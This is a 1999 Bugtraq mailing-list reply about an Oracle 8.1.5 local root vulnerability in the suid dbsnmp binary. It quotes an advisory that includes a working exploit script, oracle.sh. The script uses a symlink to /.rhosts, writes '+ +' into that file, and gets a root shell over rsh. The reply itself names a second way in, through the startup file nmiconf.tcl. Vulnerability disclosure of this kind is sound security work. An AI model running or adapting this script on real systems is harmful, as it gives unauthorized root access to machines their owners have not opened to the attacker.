[12604] in bugtraq
Re: Oracle 8 root exploit
daemon@ATHENA.MIT.EDU (Jared Still)
Tue Nov 16 12:41:03 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.SOL.3.96.991116080637.23796B-100000@sherlock.bcbso.com>
Date: Tue, 16 Nov 1999 08:12:01 -0800
Reply-To: Jared Still <jkstill@SHERLOCK.BCBSO.COM>
From: Jared Still <jkstill@SHERLOCK.BCBSO.COM>
X-To: "Tellier, Brock" <btellier@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <382DD9B0.D2FE7755@usa.net>
There is a much easier way to exploit dbsnmp than this.
Simply edit the file $ORACLE_HOME/network/agent/config/nmiconf.tcl,
which is executed when dbsnmp starts up.
This was discovered months ago and reported on this list by
Gilles Parc, gparc@mail.dotcom.fr
Jared Still
Certified Oracle DBA and Part Time Perl Evangelist ;-)
Regence BlueCross BlueShield of Oregon
jkstill@bcbso.com - Work - preferred address
jkstill@regence.com - Work
jkstill@teleport.com - private
On Sat, 13 Nov 1999, Tellier, Brock wrote:
> Greetings,
>
> OVERVIEW
> A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
> to obtain root privileges.
>
> BACKGROUND
> My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition.
> This shouldn't make any difference, however, and I would consider any
> UNIX Oracle implementation to be exploitable.
>
> DETAILS
> When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by
> default) will dump two log files out into pwd, dbsnmpc and dbsnmpt . If
> these files do not exist, dbsnmpd will attempt to create them mode 666
> and dump around 400 bytes of uncontrolable output into them. If the
> files do exist, dbsnmp will append these 400 bytes but not change the
> permissions. Thus if root does not have an .rhosts file, we can obtain
> root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts. One
> thing to note about the exploit is that on my particular implementation,
> a normal user does not have read access above /product/ in the Oracle
> path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This
> won't prevent you from running the exploit since the execute bit is set
> for world on all of Oracle's directories, but you may have to guess
> about the location of dbsnmp. This can usually done by examining the
> process list for Oracle entries.
>
> EDITORIAL
> One small rant about Oracle is their ridiculously complicated bug
> reporting scheme, which asks you 2814 questions and allows you ONE line
> of text to explain your problem. In this day and age, I don't
> understand why every major software vendor doesn't have something as
> simple as a mailto security@vendor.com SOMEWHERE on their site. In
> fact, when I searched Oracle's web page, I got zero hits on the word
> "security". Perhaps this address does exist and a bugtraq reader would
> care to enlighten me.
>
> EXPLOIT
>
> oracle8% uname -a; id
> SunOS oracle8 5.6 Generic_105181-05 sun4u sparc
> SUNW,Ultra-5_10
> uid=102(btellier) gid=10(staff)
> oracle8% /tmp/oracle.sh
> couldn't read file "/config/nmiconf.tcl": no such file or directory
> Failed to initialize nl component,error=462
> Failed to initialize nl component,error=462
> #
> --- oracle.sh ---
> #!/bin/sh
> # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
> # You'll probably have to change your path to dbsnmp
> # Exploit will only work if /.rhosts does NOT exist
> #
> # Brock Tellier btellier@usa.net
> cd /tmp
> unset ORACLE_HOME
> umask 0000
> ln -s /.rhosts /tmp/dbsnmpc.log
> /u01/app/oracle/product/8.1.5/bin/dbsnmp
> echo "+ +" > /.rhosts
> rsh -l root localhost 'sh -i'
> rsh -l root localhost rm /tmp/*log*
> rsh -l root localhost rm /.rhosts
> ------
>
